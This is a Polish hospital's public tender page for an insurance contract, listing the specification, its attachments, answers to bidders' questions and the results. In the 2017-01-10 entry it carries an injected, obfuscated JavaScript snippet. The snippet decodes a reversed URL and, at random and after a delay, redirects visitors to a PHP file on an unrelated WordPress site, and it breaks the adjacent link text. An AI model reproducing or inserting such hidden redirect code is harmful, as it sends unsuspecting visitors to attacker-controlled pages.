Data dodania: 2016-12-09 godz. 11:14

Data ogłoszenia: 2016-12-09

Usługa ubezpieczenia Szpitala Wojewódzkiego im. Kardynała Stefana Wyszyńskiego w Łomży

Znak sprawy 17/2016/OC+MIENIE_KOM/NO/U/BU

po terminie

SIWZ UNIJNY

Załącznik nr 1 do SIWZ – Opis przedmiotu zamówienia – warunki ubezpieczenia

Załącznik nr 2 do SIWZ – Informacje do oceny ryzyka

Załącznik nr 3 do SIWZ – Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej

Załącznik nr 4 do SIWZ – Jednolity Europejski Dokument Zamówienia w formacie xml

Załącznik nr 5 do SIWZ – Instrukcja wypełniania JEDZ

Załącznik nr 6 do SIWZ – Formularz ofertowy_Cz.1.

Załącznik nr 7 do SIWZ – Formularz ofertowy_Cz.2.

Załącznik nr 8 do SIWZ – Projekt umowy generalnej Szpital_Cz.1.

Załącznik nr 9 do SIWZ – Projekt umowy generalnej Szpital_Cz.2.

Załącznik nr 10 do SIWZ – Wykaz pojazdów

Załącznik nr 11 do SIWZ – Wykaz mienia do ubezpieczenia

Załącznik nr 12 do SIWZ – Szkodowość

 

Data dodania: 2016-12-30 godz. 13:29

Odpowiedzi na pytania modyfikacja SIWZ

Załącznik nr 1 do SIWZ Opis przedmiotu zamówienia warunki ubezpieczenia

Załącznik nr 11 do SIWZ Wykaz mienia do ubezpieczenia1

 

Data dodania: 2017-01-05 godz. 8:15

Odpowiedzi na pytania modyfikacja SIWZ

Załącznik nr 12 do SIWZ – Szkodowość

 

Data dodania: 2017-01-10 godz. 20:44

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(„”).reverse().join(„”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towanie-Ogłoszenie-zmian-lub-dodatkowych-informacji.pdf”>Sprostowanie Ogłoszenie zmian lub dodatkowych informacji

Odpowiedzi na pytania modyfikacja SIWZ

 

Data dodania: 2017-01-17 godz. 14:43

Informacje z otwarcia ofert

 

Data dodania: 2017-01-20 godz. 13:14

Zawiadomienie o wynikach